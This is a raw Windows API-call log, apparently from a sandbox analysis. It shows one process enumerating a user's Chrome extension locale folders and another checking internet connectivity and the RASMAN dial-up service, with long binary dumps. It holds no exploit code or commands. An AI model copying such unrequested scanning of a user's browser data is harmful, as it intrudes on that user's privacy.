\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:33,953 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:33,953 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,033 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\hr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,033 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xe2\xcel\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01`i\xd0l\xe0\x91\xcf\x01`i\xd0l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00`i\xd0l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xe6\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,033 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,033 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,114 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,114 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x86\xd6l\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01 \x86\xd6l\xe0\x91\xcf\x01 \x86\xd6l\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \x86\xd6l\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xe2\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,114 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,114 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,304 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90c\xeal\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01 l\x07m\xe0\x91\xcf\x01 l\x07m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 l\x07m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xf2\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,304 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,384 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,384 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x88 m\xe0\x91\xcf\x01\xa0\x18,m\xe0\x91\xcf\x01\xe0\x88 m\xe0\x91\xcf\x01\xe0\x88 m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x88 m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\xc0C5m\xe0\x91\xcf\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,384 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,384 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,464 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,464 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x88 m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01@\x97\x10m\xe0\x91\xcf\x01@\x97\x10m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@\x97\x10m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\x0f\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,464 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,464 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,524 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:34,524 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:34,524 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:34,524 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:34,524 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:34,544 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x1e\x12m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01p\x1e\x12m\xe0\x91\xcf\x01p\x1e\x12m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00p\x1e\x12m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,544 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,624 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x1e\x12m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xa0\xa5\x13m\xe0\x91\xcf\x01\xa0\xa5\x13m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa5\x13m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,624 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,704 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,704 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xa5\x13m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xa0\xa5\x13m\xe0\x91\xcf\x01\xa0\xa5\x13m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa5\x13m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xee\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,704 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,704 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,784 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,784 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xa5\x13m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xd0,\x15m\xe0\x91\xcf\x01\xd0,\x15m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xd0,\x15m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xe8\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,784 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,784 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,865 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\no\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,865 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0,\x15m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x00\xb4\x16m\xe0\x91\xcf\x01\x00\xb4\x16m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x16m\xe0\x91\xcf\x01\xca\xf6\x15m\xe0\x91\xcf\x01\x00\xe7\x10.\x9f\xcb\xcc\x01\x00\xb4\x16m\xe0\x91\xcf\x01\xd2\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,865 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,865 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:34,945 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:34,945 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x16m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x00\xb4\x16m\xe0\x91\xcf\x01\x00\xb4\x16m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x16m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:34,945 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:34,945 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,025 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,025 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x16m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x010;\x18m\xe0\x91\xcf\x010;\x18m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x000;\x18m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xde\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,025 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,025 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,105 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,105 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000;\x18m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01`\xc2\x19m\xe0\x91\xcf\x01`\xc2\x19m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00`\xc2\x19m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xdf\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,105 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,105 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,185 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,185 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xc2\x19m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01`\xc2\x19m\xe0\x91\xcf\x01`\xc2\x19m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00`\xc2\x19m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01 \x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,185 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,185 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,265 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,265 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90I\x1bm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x90I\x1bm\xe0\x91\xcf\x01\x90I\x1bm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x90I\x1bm\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\x1e\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,265 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,265 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,335 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:35,335 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:35,365 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172d00 | |
| 07:44:35,365 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172d00 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016a058 | |
| 07:44:35,385 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
